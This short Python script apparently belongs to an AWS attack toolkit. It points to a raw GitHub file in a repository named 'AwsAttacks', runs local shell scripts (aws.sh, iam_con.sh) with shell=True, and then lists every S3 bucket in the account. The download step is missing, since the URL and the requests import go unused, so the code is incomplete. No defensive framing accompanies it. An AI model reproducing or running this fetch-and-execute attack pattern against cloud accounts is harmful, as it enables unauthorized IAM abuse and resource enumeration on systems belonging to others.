import logging
import boto3
from botocore.exceptions import ClientError
import subprocess
import requests

url = 'https://raw.githubusercontent.com/SoOM3a/AwsAttacks/refs/heads/main/aws_iam'
local_filename = 'aws.sh'



# Command with shell=True (use with caution)
result = subprocess.run('./aws.sh', shell=True, capture_output=True, text=True)
print(result.stdout)
#./iam_con.sh
result = subprocess.run('./iam_con.sh', shell=True, capture_output=True, text=True)
print(result.stdout)


s3 = boto3.client('s3')
response = s3.list_buckets()
print('Existing buckets:')
for bucket in response['Buckets']:
  print(f'  {bucket["Name"]}')
